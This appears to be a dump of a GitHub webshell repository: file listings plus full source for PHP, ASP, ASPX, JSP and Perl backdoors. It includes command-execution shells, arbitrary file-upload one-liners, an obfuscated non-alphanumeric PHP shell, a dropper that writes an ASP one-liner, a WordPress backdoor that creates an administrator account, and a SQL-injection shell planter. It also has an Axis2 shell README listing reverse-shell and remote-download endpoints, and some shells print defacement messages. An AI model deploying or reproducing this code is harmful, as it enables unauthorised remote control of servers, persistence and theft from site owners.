https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/ewebedtior编辑器本地构造上传漏洞利用代码.html -------------------------------------------------------------------------------- /Other/acat/ACat-附数据库驱动-jdk1.5.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/acat/ACat-附数据库驱动-jdk1.5.jar -------------------------------------------------------------------------------- /Php/PHP-Shell-Detector-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PHP-Shell-Detector-master.zip -------------------------------------------------------------------------------- /Php/Spider PHP Shell (SPS-3.0).php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Spider PHP Shell (SPS-3.0).php -------------------------------------------------------------------------------- /Asp/80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一.asp -------------------------------------------------------------------------------- /Other/cat.aar/axis2 利用小工具cat.aar.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/cat.aar/axis2 利用小工具cat.aar.zip -------------------------------------------------------------------------------- /Php/KAdot Universal Shell v0.1.6.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/KAdot Universal Shell v0.1.6.php -------------------------------------------------------------------------------- /Php/KAdot_Universal_Shell_v0.1.6.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/KAdot_Universal_Shell_v0.1.6.php -------------------------------------------------------------------------------- /Php/Silic Group php Webshell v3.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Silic Group php Webshell v3.php -------------------------------------------------------------------------------- /Other/File include Bypass/litteryi.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/File include Bypass/litteryi.txt -------------------------------------------------------------------------------- /Php/GFS web-shell ver 3.1.7 - PRiV8.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/GFS web-shell ver 3.1.7 - PRiV8.php -------------------------------------------------------------------------------- /Php/GFS_web-shell_ver_3.1.7_-_PRiV8.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/GFS_web-shell_ver_3.1.7_-_PRiV8.php -------------------------------------------------------------------------------- /Aspx/WebSniff 1.0 Powered by C.C.T.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Aspx/WebSniff 1.0 Powered by C.C.T.aspx -------------------------------------------------------------------------------- /Php/Antichat Shell. Modified by Go0o$E.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Antichat Shell. Modified by Go0o$E.php -------------------------------------------------------------------------------- /Php/Ayyildiz Tim -AYT- Shell v 2.1 Biz.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Ayyildiz Tim -AYT- Shell v 2.1 Biz.php -------------------------------------------------------------------------------- /Php/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt -------------------------------------------------------------------------------- /Php/Adminer - Compact database management.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Adminer - Compact database management.php -------------------------------------------------------------------------------- /Php/Silic Group Hacker Army - BlackBap.Org.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Silic Group Hacker Army - BlackBap.Org.php -------------------------------------------------------------------------------- /Asp/RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer.asp -------------------------------------------------------------------------------- /Php/AK-74 Security Team Web Shell Beta Version.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/AK-74 Security Team Web Shell Beta Version.php -------------------------------------------------------------------------------- /Php/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php -------------------------------------------------------------------------------- /Jsp/Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp -------------------------------------------------------------------------------- /Aspx/MYSQL Manager -Asp.net Silic Group Hacker Army专用版本.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Aspx/MYSQL Manager -Asp.net Silic Group Hacker Army专用版本.aspx -------------------------------------------------------------------------------- /File include Bypass/includer.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Other/File include Bypass/includer.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php -------------------------------------------------------------------------------- /Other/jdk1.3webshell/readme.MD: -------------------------------------------------------------------------------- 1 | jdk 1.3 tomcat 7测试通过 2 | 3 | jdk 1.3 weblogic 8测试通过 4 | 5 | 只完成基本的文件操作功能(文件浏览,上传、下载、删除、编辑)和命令执行 6 | 7 | [site](http://www.shack2.org/article/1415181383.html) -------------------------------------------------------------------------------- /Php/blackbin/v1/readme.md: -------------------------------------------------------------------------------- 1 | look here: 2 | 3 | http://blog.wangzhan.360.cn/?p=65 4 | 5 | 6 | demo : 7 | 8 | first you open webshell is "404", then enter "p", after show login page 9 | 10 | pass: demo123456 -------------------------------------------------------------------------------- /Other/cat.aar/Readme.md: -------------------------------------------------------------------------------- 1 | #axis2 利用小工具cat.aar 2 | 3 | Author:园长 4 | 文章url:http://p2j.cn/?p=1548 5 | [下载文章的pdf](https://raw.githubusercontent.com/tennc/webshell/master/other/cat.aar/axis2%20%E5%88%A9%E7%94%A8%E5%B0%8F%E5%B7%A5%E5%85%B7cat.pdf) 6 | -------------------------------------------------------------------------------- /Php/ZyklonShell.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 Not Found 4 | 5 |

Not Found

6 | The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.

7 | 8 | -------------------------------------------------------------------------------- /构造的上传.html: -------------------------------------------------------------------------------- 1 |

Upload a new file:
3 |
4 | 5 |
-------------------------------------------------------------------------------- /FCKeditor编辑器本地构造的上传.html: -------------------------------------------------------------------------------- 1 |
Upload a new file:
3 |
4 | 5 |
-------------------------------------------------------------------------------- /Jsp/新型JSP小马支持上传任意格式文件.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream is=request.getInputStream();byte[] b=new byte[512];int n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%> -------------------------------------------------------------------------------- /Php/Uploader.php: -------------------------------------------------------------------------------- 1 |
2 | 3 | Send this file: 4 | 5 |
6 | 9 | 10 | -------------------------------------------------------------------------------- /Aspx/上传马.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="VB" %> 2 | <%@ import Namespace="System.IO" %> 3 | 10 | -------------------------------------------------------------------------------- /Php/blackbin/v1/make2.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/simple-backdoor.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | "; 7 | $cmd = ($_REQUEST['cmd']); 8 | system($cmd); 9 | echo ""; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 16 | 17 | 18 | -------------------------------------------------------------------------------- /Jsp/带回显执行cmd.jsp: -------------------------------------------------------------------------------- 1 | <% if("023".equals(request.getParameter("pwd"))){ 2 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); 3 | int a = -1; 4 | byte[] b = new byte[2048]; 5 | out.print("
");  
 6 |         while((a=in.read(b))!=-1){  
 7 |             out.println(new String(b));  
 8 |         }  
 9 |         out.print("
"); 10 | } %> 11 | -------------------------------------------------------------------------------- /Php/simple_cmd.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | G-Security Webshell 4 | 5 | 6 | 7 |
8 |
9 | 11 |
12 | 
13 | 
14 | 
15 |
16 |
17 | 18 | 3 | 4 | "; 8 | $cmd = ($_REQUEST['cmd']); 9 | system($cmd); 10 | echo ""; 11 | die; 12 | } 13 | 14 | ?> 15 | 16 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /Php/Non-alphanumeric.php: -------------------------------------------------------------------------------- 1 | >$_;$_[]=$__;$_[]=@_;@$_[((++$__)+($__++ ))].=$_; 4 | $_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__]; 5 | $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] ); 6 | $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] ); 7 | $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ]; 8 | $_=$ 9 | $_[$__+ $__] ;$_[@-_]($_[@!+_] ); 10 | 11 | ?> -------------------------------------------------------------------------------- /asp.ashx: -------------------------------------------------------------------------------- 1 | <%@ WebHandler Language="C#" class="Handler" %> 2 | 3 | using System; 4 | using System.Web; 5 | using System.IO; 6 | public class Handler : IHttpHandler { 7 | 8 | public void ProcessRequest (HttpContext context) { 9 | context.Response.ContentType = "text/plain"; 10 | 11 | StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp")); 12 | file1.Write("<%response.clear:execute request(\"root\"):response.End%>"); 13 | file1.Flush(); 14 | file1.Close(); 15 | 16 | } 17 | 18 | public bool IsReusable { 19 | get { 20 | return false; 21 | } 22 | } 23 | 24 | } 25 | -------------------------------------------------------------------------------- /Other/acat/readme.md: -------------------------------------------------------------------------------- 1 | Author:园长MM 2 | 3 | 4 | 下载: 5 | ACat-jdk1.5.jar、ACat-附数据库驱动-jdk1.5.jar、 ACat-jdk.1.7.jar、ACat-附数据库驱动.jar 6 | 7 | 源码: 8 | ACat-src.zip 9 | 10 | 描述: 11 | 12 | 这是一个用java实现的非常小(18kb)的webServer。之前在drops发了一个简单的demo:http://drops.wooyun.org/papers/869。这个也非常简单,只实现了几个servlet的api,不过已实现了后门相关的其他功能。启动成功后会开启9527端口,然后访问:http://xxx.com:9527/api.jsp,密码:023。 13 | 14 | 停止服务:http://xxx.com:9527/api.jsp?action=stop 15 | 16 | 密码和端口配置在jar里面的server.properties: 17 | 18 | 19 | 20 | 运行方式:java -jar ACat.jar或者在jsp里面调用。 21 | 22 | 23 | 24 | 如果需要连接数据库需要下载:ACat-附数据库驱动.jar,或者自行添加相关jar。 -------------------------------------------------------------------------------- /Aspx/ASPX one line Code Client by amxku.aspx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ASPX one line Code Client by amxku 5 | 6 | 7 |
8 | 13 |

14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /Php/ru24_post_sh.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | Ru24PostWebShell - ".$_POST['cmd']." 13 | 14 | "; 15 | echo ""; 16 | echo ""; 17 | echo ""; 18 | echo "
";
19 | if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
20 | echo "".$function($_POST['cmd'])."
"; 21 | 22 | 23 | ?> 24 | -------------------------------------------------------------------------------- /Php/wordpress backdoor.txt: -------------------------------------------------------------------------------- 1 | set_role( 'administrator' ); 10 | } else { 11 | die("User already exists..."); 12 | } 13 | } 14 | } -------------------------------------------------------------------------------- /cmd.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.io.*" %> 2 | <% 3 | try { 4 | String cmd = request.getParameter("cmd"); 5 | Process child = Runtime.getRuntime().exec(cmd); 6 | InputStream in = child.getInputStream(); 7 | int c; 8 | while ((c = in.read()) != -1) { 9 | out.print((char)c); 10 | } 11 | in.close(); 12 | try { 13 | child.waitFor(); 14 | } catch (InterruptedException e) { 15 | e.printStackTrace(); 16 | } 17 | } catch (IOException e) { 18 | System.err.println(e); 19 | } 20 | %> 21 | -------------------------------------------------------------------------------- /Jsp/上传小马.jsp: -------------------------------------------------------------------------------- 1 | <%@ page language="java" pageEncoding="gbk"%><% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>0<%}}if(i==0){%>1<%}%>
" name="url">
38 | 39 |
- BY F4ck
40 |
41 | <% end if %> 42 | 43 | shell.asp?miemie=av -------------------------------------------------------------------------------- /Php/pHpINJ.php: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | || .::News Remote PHP Shell Injection::. || 6 | 7 | 8 |
|| .::News PHP Shell Injection::. ||


9 | ' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile"; 15 | $sql = urlencode($sql); 16 | $expurl= $url."?id=".$sql ; 17 | echo ' Click Here to Exploit
'; 18 | echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results"; 19 | } 20 | else 21 | { 22 | ?> 23 | Url to index.php:
24 |
" method = "post"> 25 |
26 | Server Path to Shell:
27 | Full server path to a writable file which will contain the Php Shell
28 |

29 |

30 | 31 | 32 | 33 | 36 | 37 | -------------------------------------------------------------------------------- /Other/Axis2Shell/README.md: -------------------------------------------------------------------------------- 1 | axis2 2 | ========= 3 | 4 | axis2 web shell 5 | author : Svti 6 | url : https://github.com/Svti/Axis2Shell 7 | 8 | 使用介绍: 9 | 10 | 1、命令执行 11 | http://1.1.1.1/services/config/exec?cmd=whoami 12 | (不说了,执行命令。注意:xml换行没有处理好) 13 | 14 | 2、反弹shell 15 | http://1.1.1.1/services/config/shell?host=1.1.1.1&port=5555 16 | (Linux则使用bash反弹shell,Windows则会进行socket执行shell) 17 | 18 | 3、文件上传 19 | http://1.1.1.1/services/config/upload?path=/opt/tomcat/webapps/ROOT/shell.jsp 20 | (会把resource目录下面的one.txt 写成shell.jsp,注意:全路径,带*文件名) 21 | 22 | 4、文件下载 23 | http://1.1.1.1/services/config/download?url=http://www.ooo.com/mm.txt&path=/opt/tomcat/webapps/ROOT/shell.jsp 24 | (会把这个URL的文件写成shell.jsp,注意:全路径,带*文件名) 25 | 26 | 27 | 5、class目录查看 28 | http://1.1.1.1/services/config/getClassPath 29 | (会显示当前class的路径,方便文件上传) 30 | 31 | ps: 32 | 趁周末休息,看了几个国外的机器有 axis的 项目,特地去找了@园长的Cat.aar工具,发现真心不好使。 33 | 34 | 1、反弹shell 鸡肋,好多错误 ,ls / 都不行。 35 | 36 | 2、没有文件上传功能。这个对于一个渗透着来说很重要 37 | 38 | 于是自己写了个,希望大家喜欢。 39 | 40 | 源码已经上github https://github.com/Svti/Axis2Shell 41 | 42 | aar 文件 https://github.com/Svti/Axis2Shell/blob/master/config.aar 也在github上面,还有什么问题,可以在下面评论 43 | 44 | 45 | 注意: 46 | 47 | 1、相同文件名的aar文件只能上传一次,虽说是remove Service了,服务器上面的还在。想要继续使用,请rename 48 | 49 | 2、默认的jsp一句话木马是/resource/one.txt,可以自己修改。默认密码是wooyun,发布版本里面放的是one.jsp,一向鄙视伸手党 50 | 3、Linux反弹shell 会在当前目录生成一个wooyun.sh的文件,当shell断开后会自动删除 51 | 52 | -------------------------------------------------------------------------------- /Asp/CmdAsp.asp: -------------------------------------------------------------------------------- 1 | <++ CmdAsp.asp ++> 2 | <%@ Language=VBScript %> 3 | <% 4 | ' --------------------o0o-------------------- 5 | ' File: CmdAsp.asp 6 | ' Author: Maceo 7 | ' Release: 2000-12-01 8 | ' OS: Windows 2000, 4.0 NT 9 | ' ------------------------------------------- 10 | 11 | Dim oScript 12 | Dim oScriptNet 13 | Dim oFileSys, oFile 14 | Dim szCMD, szTempFile 15 | 16 | On Error Resume Next 17 | 18 | ' -- create the COM objects that we will be using -- ' 19 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 20 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 21 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 22 | 23 | ' -- check for a command that we have posted -- ' 24 | szCMD = Request.Form(".CMD") 25 | If (szCMD <> "") Then 26 | 27 | ' -- Use a poor man's pipe ... a temp file -- ' 28 | szTempFile = "C:\" & oFileSys.GetTempName( ) 29 | Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 30 | Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 31 | 32 | End If 33 | 34 | %> 35 | 36 | 37 | " method="POST"> 38 | 39 | 40 | 41 | 
42 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
43 | 

44 | <%
45 | If (IsObject(oFile)) Then
46 | ' -- Read the output from our command and remove the temp file -- '
47 | On Error Resume Next
48 | Response.Write Server.HTMLEncode(oFile.ReadAll)
49 | oFile.Close
50 | Call oFileSys.DeleteFile(szTempFile, True)
51 | End If
52 | %>
53 | 
54 | 
55 | <-- CmdAsp.asp -->
56 | 


--------------------------------------------------------------------------------
/Jsp/小马.jsp:
--------------------------------------------------------------------------------
 1 | <%@page contentType="text/html;charset=gb2312"%>    
 2 | <%@page import="java.io.*,java.util.*,java.net.*"%>    
 3 |     
 4 |       
 5 |         
 6 |         
 9 |       
10 |       
11 |   <%    
12 |    if(request.getParameter("context")!=null)    
13 |    {    
14 |    String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"gb2312");    
15 |    String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"gb2312");    
16 |    OutputStream pt = null;    
17 |         try {    
18 |             pt = new FileOutputStream(path);    
19 |             pt.write(context.getBytes());    
20 |             out.println("上传成功!");    
21 |         } catch (FileNotFoundException ex2) {    
22 |             out.println("上传失败!");    
23 |         } catch (IOException ex) {    
24 |             out.println("上传失败!");    
25 |         } finally {    
26 |             try {    
27 |                 pt.close();    
28 |             } catch (IOException ex3) {    
29 |                 out.println("上传失败!");    
30 |             }    
31 |         }    
32 | }    
33 |   %>    
34 |     
    
35 |     本文件的路径:<%out.print(request.getRealPath(request.getServletPath())); %>    
36 |     
    
37 |     
    
38 |     上传文件路径:">    
39 |     
    
40 |     
    
41 |     上传文件内容:    
42 |     
    
43 |     
    
44 |         
45 |     
    
46 |       
47 |    
48 | 


--------------------------------------------------------------------------------
/Jsp/hahahaha小马.JSp:
--------------------------------------------------------------------------------
 1 | <%@page contentType="text/html; charset=GBK" import="java.io.*;"%>
 2 | <%!private String password="admin";//?·??????????BC??????%>
 3 | 
 4 | 
 5 | hahahaha
 6 | 
 7 | 
 8 | <%
 9 | String act="";
10 | String path=request.getParameter("path");
11 | String content=request.getParameter("content");
12 | String url=request.getRequestURI();
13 | String url2=request.getRealPath(request.getServletPath());
14 | try
15 | {act=request.getParameter("act").toString();}
16 | catch(Exception e){}
17 | if(request.getSession().getAttribute("hehe")!=null)
18 | {
19 | if(request.getSession().getAttribute("hehe").toString().equals("hehe"))
20 | {
21 | if (path!=null && !path.equals("") && content!=null && !content.equals(""))
22 | {
23 |    try{
24 |      File newfile=new File(path);
25 |      PrintWriter writer=new PrintWriter(newfile);
26 |      writer.println(content);
27 |      writer.close();
28 |      if (newfile.exists() && newfile.length()>0)
29 |      {
30 |        out.println("save ok!");
31 |      }else{
32 |        out.println("save erry!");
33 |      }
34 |    }catch(Exception e)
35 |    {
36 |      e.printStackTrace();
37 |    }
38 | }
39 | out.println("
");
40 | out.println("

");
41 | out.println(""+url2+"
");
42 | out.println("
");
43 | out.println("");
44 | out.println("
");
45 | }
46 | }else{
47 | out.println("
");
48 | out.println("");
49 | out.println("");
50 | out.println("
");
51 | }if(act.equals("login"))
52 | {
53 |     String pass=request.getParameter("pass");
54 |     if(pass.equals(password))
55 |     {
56 |      session.setAttribute("hehe","hehe");
57 |      String uri=request.getRequestURI();   
58 |      uri=uri.substring(uri.lastIndexOf("/")+1); 
59 |     response.sendRedirect(uri);
60 |     }else
61 |     {
62 | out.println("Error");
63 | out.println("go back
");
64 |     }
65 |     }
66 | %>
67 | 
68 | 
69 | 
70 | 


--------------------------------------------------------------------------------
/Pl/GO.cgi.pl:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/perl
 2 | 
 3 | #change this password; for power security - delete this file =)
 4 | $pwd='adm';
 5 | 
 6 | print "Content-type: text/html\n\n";
 7 | &read_param();
 8 | if (!defined$param{dir}){$param{dir}="/"};
 9 | if (!defined$param{cmd}){$param{cmd}="ls -la"};
10 | if (!defined$param{pwd}){$param{pwd}='ter'};
11 | 
12 | print << "[kalabanga]";
13 | 
14 | GO.cgi
15 | 
38 | 
39 | 
40 | Current request is:
41 | 

42 | [kalabanga]
43 | 
44 | print "cd $param{dir}&&$param{cmd}";
45 | 
46 | print << "[kalabanga]";
47 | 

48 | Answer for current request is:
49 | 
50 | [kalabanga]
51 | 
52 | if ($param{pwd} ne $pwd){print "user invalid, please replace user";}
53 | else {
54 | open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
55 | while ($line=){print "$line";};
56 | close (FILEHANDLE);
57 | };
58 | 
59 | print << "[kalabanga]";
60 | 

61 | 

62 | Password:
63 | 
64 | Dir for next request:
65 | 
66 | next request:
67 | 
68 | 
69 | 
70 | 

71 | 
72 | 
73 | [kalabanga]
74 | 
75 | sub read_param {
76 | $buffer = "$ENV{'QUERY_STRING'}";
77 | @pairs = split(/&/, $buffer);
78 | foreach $pair (@pairs)
79 |         {
80 |         ($name, $value) = split(/=/, $pair);
81 |         $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
82 |         $value =~ s/\+/ /g;
83 |         $value =~ s/%20/ /g;
84 |         $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
85 |         $param{$name} = $value;
86 |         }
87 | }


--------------------------------------------------------------------------------
/Php/Worse Linux Shell.php:
--------------------------------------------------------------------------------
 1 | body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}";
 6 | print "
#worst @dal.net
";
 7 | print "
You have been hack By Shany with Love To #worst.
";
 8 | print "
Watch Your system Shany was here.
";
 9 | print "
Linux Shells
";
10 | print "
";
11 | 
12 | $currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
13 | $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
14 | 
15 | $UName  = `uname -a`;
16 | $SCWD   = `pwd`;
17 | $UserID = `id`;
18 | 
19 | if( $currentWD == "" ) {
20 |     $currentWD = $SCWD;
21 | }
22 | 
23 | print "";
24 | print "";
25 | print "";
26 | print "";
27 | print "";
28 | print "
We are:".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")
Server is:".$_SERVER['SERVER_SIGNATURE']."
System type:$UName
Our permissions:$UserID
";
29 | 
30 | print "
";
31 | 
32 | if( $_POST['_act'] == "List files!" ) {
33 |     $currentCMD = "ls -la";
34 | }
35 | 
36 | print "
";
37 | 
38 | print "";
39 | print "";
40 | 
41 | print "";
42 | print "";
43 | 
44 | print "";
45 | print "";
46 | 
47 | print "
Execute command:
Change directory:
Upload file:
";
48 | 
49 | $currentCMD = str_replace("\\\"","\"",$currentCMD);
50 | $currentCMD = str_replace("\\\'","\'",$currentCMD);
51 | 
52 | if( $_POST['_act'] == "Upload!" ) {
53 |     if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
54 |         print "
Error while uploading file!
";
55 |     } else {
56 |         print "
";
57 |         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
58 |         print "
File uploaded successfully!
";
59 |     }    
60 | } else {
61 |     print "\n\n\n
\n";
62 |     $currentCMD = "cd ".$currentWD.";".$currentCMD;
63 |     system($currentCMD);
64 |     print "\n
\n\n\n
Command completed
"; 65 | } 66 | 67 | exit; 68 | 69 | ?> 70 | -------------------------------------------------------------------------------- /Php/h4ntu shell [powered by tsoi].php: -------------------------------------------------------------------------------- 1 | h4ntu shell [powered by tsoi] 2 | This Is The Server Information

"; 4 | ?> 5 | 6 | 16 | 17 |
18 | 19 | 23 | 24 | 25 | 26 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 |
:
User Info: uid=() euid=() gid=()
Current Path:
Permission Directory:
Server Services:
Server Adress:
Script Current User:
PHP Version:
55 |
56 | 57 | #php injection:
58 |
"> 59 | cmd : 60 | 61 |
62 | 63 |
64 | 65 |
66 | 67 | 
68 |  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
73 |   $output = ob_get_contents();
74 |   ob_end_clean();
75 |   if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
76 | exit;
77 | ?>
78 |
79 | -------------------------------------------------------------------------------- /Php/h4ntu_shell_[powered_by_tsoi].php: -------------------------------------------------------------------------------- 1 | h4ntu shell [powered by tsoi] 2 | This Is The Server Information

"; 4 | ?> 5 | 6 | 16 | 17 |
18 | 19 | 23 | 24 | 25 | 26 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 |
:
User Info: uid=() euid=() gid=()
Current Path:
Permission Directory:
Server Services:
Server Adress:
Script Current User:
PHP Version:
55 |
56 | 57 | #php injection:
58 |
"> 59 | cmd : 60 | 61 |
62 | 63 |
64 | 65 |
66 | 67 | 
68 |  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
73 |   $output = ob_get_contents();
74 |   ob_end_clean();
75 |   if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
76 | exit;
77 | ?>
78 |
79 | -------------------------------------------------------------------------------- /Php/NCC-Shell.php: -------------------------------------------------------------------------------- 1 |
2 |

.:NCC:. Shell v1.0.0

3 | .:NCC:. Shell v1.0.0 4 |

Hacked by Silver

5 |

---------------------------------------------------------------------------------------


6 | ---Server Info---
7 | Safe Mode on/off: "; 9 | // Check for safe mode 10 | if( ini_get('safe_mode') ) { 11 | print 'Safe Mode ON'; 12 | } else { 13 | print 'Safe Mode OFF'; 14 | } 15 | echo "
"; 16 | echo "Momentane Directory: "; echo $_SERVER['DOCUMENT_ROOT']; 17 | echo "
"; 18 | echo "Server:
"; echo $_SERVER['SERVER_SIGNATURE']; 19 | echo "PHPinfo"; 20 | if(@$_GET['p']=="info"){ 21 | @phpinfo(); 22 | exit;} 23 | ?> 24 |

---------------------------------------------------------------------------


25 |

- Upload -

26 | Upload - Shell/Datei 27 |
31 | 32 | 33 |
34 |
35 | \n", 41 | $_FILES['probe']['name']); 42 | printf("Sie ist %u Bytes groß und vom Typ %s.
\n", 43 | $_FILES['probe']['size'], $_FILES['probe']['type']); 44 | } 45 | ?> 46 |

---------------------------------------------------------------------------


47 |

IpLogger

48 |
IP: "; echo $_SERVER['REMOTE_ADDR']; 50 | echo "
PORT: "; echo $_SERVER['REMOTE_PORT']; 51 | echo "
BROWSER: "; echo $_SERVER[HTTP_REFERER]; 52 | echo "
REFERER: "; echo $_SERVER['HTTP_USER_AGENT']; 53 | ?> 54 |

---------------------------------------------------------------------------


55 |

Directory Lister

56 |

>

57 |

---------------------------------------------------------------------------


58 | --Coded by Silver©--
59 | ~|_Team .:National Cracker Crew:._|~
60 | -->NCC<--
61 | -------------------------------------------------------------------------------- /Php/lamashell.php: -------------------------------------------------------------------------------- 1 | 18 | 20 | 21 | 22 | lama's'hell v. 3.0 23 | 30 | 31 | 32 | 
33 |                               _           _
34 |                              / \_______ /|_\
35 |                             /          /_/ \__
36 |                            /             \_/ /
37 |                          _|_              |/|_
38 |                          _|_  O    _    O  _|_
39 |                          _|_      (_)      _|_
40 |                           \                 /
41 |                            _\_____________/_
42 |                           /  \/  (___)  \/  \
43 |                           \__(  o     o  )__/ 
58 |
59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 |
Execute command:
Change directory:
Upload file:
67 | 

68 | 
";
72 |     } else {
73 |         echo "There was an error uploading the file, please try again!";
74 |     }
75 |     }
76 |     if(($_POST['exe']) == "Execute") {
77 |      $curcmd = "cd ".$curdir.";".$curcmd;
78 |      $f=popen($curcmd,"r");
79 |      while (!feof($f)) {
80 |       $buffer = fgets($f, 4096);
81 |       $string .= $buffer;
82 |      }
83 |      pclose($f);
84 |      echo htmlspecialchars($string);
85 |     }
86 | ?>
87 |
